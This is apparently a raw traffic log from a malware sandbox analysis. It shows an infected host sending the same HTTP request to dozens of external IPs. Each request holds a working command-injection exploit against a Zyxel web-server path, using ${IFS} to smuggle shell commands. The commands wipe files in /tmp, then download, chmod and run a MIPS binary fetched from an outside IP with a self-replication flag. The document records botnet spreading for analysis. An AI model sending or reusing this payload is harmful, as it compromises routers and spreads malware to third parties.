                                            Feb 2, 2024 06:21:15.685251951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5146192.168.2.15488101.134.61.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685297012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5147192.168.2.1559422164.161.59.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685339928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5148192.168.2.155739075.29.97.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685364962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5149192.168.2.1532978122.184.208.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685409069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5150192.168.2.1543464163.103.62.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685445070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5151192.168.2.1560370104.37.233.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685502052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5152192.168.2.1537326175.104.32.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685528040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5153192.168.2.154352266.13.78.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685569048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5154192.168.2.1547536122.225.9.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685591936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5155192.168.2.1544110128.9.109.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685620070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5156192.168.2.1546228197.178.83.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685698986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5157192.168.2.15446042.245.200.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685740948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5158192.168.2.1556212201.147.139.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685764074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5159192.168.2.155230892.44.71.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685784101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5160192.168.2.1545372112.73.43.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685846090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5161192.168.2.154194625.123.226.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.685873985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5162192.168.2.154770280.15.58.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.689227104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5163192.168.2.15369649.142.132.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.689255953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5164192.168.2.1538888151.84.37.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.689301014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5165192.168.2.1535548157.1.216.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.697828054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5166192.168.2.1539212150.95.68.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.697860956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5167192.168.2.1545246128.200.161.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.697909117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5168192.168.2.155183692.209.174.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.697942972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5169192.168.2.1555258160.113.5.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.697964907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5170192.168.2.1537570102.169.180.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698035955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5171192.168.2.1557280177.253.105.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698084116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5172192.168.2.1549686146.213.195.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698098898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5173192.168.2.154740877.234.29.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698160887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5174192.168.2.154576840.35.31.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698190928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5175192.168.2.153919831.225.169.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698229074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5176192.168.2.1546818210.191.75.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698268890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5177192.168.2.1560086220.80.187.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698272943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5178192.168.2.153972246.27.221.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698319912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5179192.168.2.1547038132.162.180.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698363066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5180192.168.2.155319483.114.160.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698402882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5181192.168.2.1549784117.66.106.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698434114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5182192.168.2.1556432184.23.96.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698491096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5183192.168.2.1535060177.95.125.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698525906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5184192.168.2.154879299.55.32.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698569059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5185192.168.2.155715098.129.189.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698620081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5186192.168.2.1549660212.107.171.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698667049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5187192.168.2.153598488.120.108.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698707104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5188192.168.2.153611860.86.135.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698738098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5189192.168.2.155687466.49.65.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698798895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5190192.168.2.1556212180.109.241.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698834896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5191192.168.2.154097840.31.253.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698854923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5192192.168.2.15347008.134.56.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698895931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5193192.168.2.1537554133.154.181.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698945045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5194192.168.2.1545796162.53.207.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.698978901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5195192.168.2.154324264.248.28.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699014902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5196192.168.2.1538718101.180.62.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699045897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5197192.168.2.1545994216.30.11.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699100971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5198192.168.2.1552312120.241.200.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699131012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5199192.168.2.155050824.4.221.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699178934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5200192.168.2.1557080223.215.235.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699225903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5201192.168.2.155765650.153.47.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699265003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5202192.168.2.1555824201.39.119.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699287891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5203192.168.2.1545002209.195.249.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699295998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5204192.168.2.1558542222.63.255.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699350119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5205192.168.2.1537590140.221.250.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699381113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5206192.168.2.153962035.220.49.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699428082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5207192.168.2.153786052.170.99.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699462891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5208192.168.2.1542644223.42.52.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699505091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5209192.168.2.1546110167.24.143.21443
                                            TimestampBytes transferredDirectionData
